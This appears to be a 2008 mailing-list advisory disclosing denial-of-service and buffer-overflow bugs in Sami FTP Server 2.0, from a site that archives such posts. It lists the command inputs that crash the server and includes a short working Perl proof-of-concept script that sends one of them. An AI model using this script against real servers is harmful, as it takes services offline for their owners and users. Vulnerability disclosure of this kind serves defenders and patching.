Sami FTP Server 2.0.* Multiple Remote Vulnerabilities

From: securfrog@xxxxxxxxx
Date: 15 Feb 2008 00:38:09 -0000

###################################################################################################################
# Sami FTP Server 2.0.* Multiple Remote Vulnerabilities
#
# Bugs :
#
# 1)Multiples remote denial of service (CWD,DELE,MKD,RMD,RETR,RNFR,RNTO,SIZE,STOR)
#
# 2)Remote Buffer overflow (Logs)
#
# Remote Denial of service:
# APPE A => server gone
#
# CWD AA => server gone
#
# DELE AA ==> server gone
#
# MKD AA ==> server gone
#
# RMD AA ==> server gone
#
# RETR AA ==> server gone
#
# RNFR AA ==> server gone
#
# RNTO AA ==> server gone
#
# SIZE AA ==> server gone
#
# STOR AA ==> server gone
#
#
# Buffer Overflow :
# In the console management,you can view your logs,and set some stuff,when you open the console management a
# buffer overflow occurs ,if you have send previously a request(no matter the command) with 1024 bytes to the server.
# Also explorer.exe crash at the same time, 2 in 1 ;] The file is called(SamyFtp.binlog)note that this bug is
# quite critical , because it will occurs all the time,when you open the console management,and you dont need to be loggued
# you can simply send a username with 1024 bytes ...
#
#
# @nolife: Life is always better when you dont know. things are clearer also smile
#
#
#
# Denial of service Poc
#
#
use Net::FTP;
(($target = $ARGV[0])) || die "usage:$0 <target> <port>";
my $user = "anonymous";
my $pass = "something";
print "Trying to connect to :$target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect";
print "Connected!\n";
$ftp->login($user, $pass);
$ftp->cwd("AA");
print "Poc Successfull the server should down now \n";
$ftp->quit;

Prev by Date: Re: SECURITY ADVISORY - Level Platforms, Inc. Service Center Install Data HTTP Vulnerability
Next by Date: SellOwnHouse login SQL Injection
Previous by thread: [INFIGO-2008-02-13]: SOPHOS Email Security Appliance Cross Site Scripting Vulnerability
Next by thread: SellOwnHouse login SQL Injection
Index(es):
- Date
- Thread

Relevant Pages

[NT] Multiple Vulnerabilities in JanaServer
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Windows platform can act as HTTP/FTP/NEWS/SNTP server, ... JanaServer up to 1.46 was freeware, ... HTTP server buffer overflow ...
(Securiteam)
Switch Off Multiple Vulnerabilities
... Stack-based Buffer Overflow ... execute arbitrary code on the remote system - possibly with SYSTEM ... cause the server to execute a specially crafted request which will trigger ... vulnerability before such code is made public, ...
(Bugtraq)
[VulnWatch] Switch Off Multiple Vulnerabilities
... Stack-based Buffer Overflow ... execute arbitrary code on the remote system - possibly with SYSTEM ... cause the server to execute a specially crafted request which will trigger ... vulnerability before such code is made public, ...
(VulnWatch)
Remote buffer overflow in MailEnable IMAP service [Hat-Squad Advisory]
... MailEnable's Mail Server software provides a enterprise messaging platform for Microsoft Windows NT/2000/XP/2003 systems. ... Two vulnerabilities were discovered by Hat-Squad Team in MailEnable's IMAP service including a stack based buffer overflow ... and an object pointer overwrite, both can lead to remote execution of arbitrary code. ... 8198 bytes will cause a stack buffer overflow.This vulnerability can be triggered before any kind of authentification. ...
(Bugtraq)
[VulnWatch] IA WebMail Server 3.x Buffer Overflow Vulnerability
... IA WebMail Server 3.x Buffer Overflow Vulnerability ... the execution of a 'retn' instruction. ... It is also possible to execute a fairly large amount of code ...
(VulnWatch)